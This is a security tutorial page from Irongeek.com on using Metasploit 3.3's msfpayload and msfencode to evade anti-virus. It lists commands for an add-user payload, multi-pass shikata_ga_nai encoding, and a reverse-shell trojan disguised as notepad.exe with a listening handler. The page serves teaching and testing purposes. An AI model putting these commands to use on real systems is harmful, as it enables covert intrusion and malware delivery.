A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus (Hacking Illustrated Series InfoSec Tutorial Videos)

Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus


        This subject has been covered before, but why not once more? Metasploit 3.3 adds some new options, and better Windows support. As stated in the title, this video will cover using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus. I will also talk a little about using CWSandbox and VirusTotal to examine malware.

        If you find this video useful, consider going to the Metasploit Unleashed page and donating to the Hackers For Charity Kenya food for work program, or come to the IndySec charity event.

        By the way, I've put out two versions of this video, one an SWF and the other a streaming video. Please let me know which you prefer.


 If the embedded video below does not show RIGHT click here to save the file to your hard drive.

Streaming video version:

Download WMV:
http://blip.tv/file/get/Irongeek-msf127.wmv

 

 

Commands used:
        Show msfpayload help:
        msfpayload -h|less

Find something specific in the help:
        msfpayload -h | grep add

Show add a user payload example:
        msfpayload windows/adduser s

Set the payload to add a user:
        msfpayload windows/adduser pass=somepassword user=evil x>out.exe

Show the fact it won't work yet, and show rights:
        out.exe

Set execute rights:
        chmod +x out.exe

Show that it works now, then use MMC to show the user was created:
        out.exe

Show msfencode options:
        msfencode -h

Show msfencode encoders:
        msfencode -l

Encoded twice, once with one pass and again with 10, then upload both to virus total to see the difference:
        msfpayload windows/adduser pass=somepassword user=evil r | msfencode -t exe -o e1.exe
    msfpayload windows/adduser pass=somepassword user=evil r | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o e2.exe

Show msfcli help, then payload options:
        msfcli -h
        msfpayload windows/shell/reverse_tcp s

Make the reverse shell payload exe, then the multi handler, then execute it on some other box:
        msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 R | msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe
        msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E
 

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast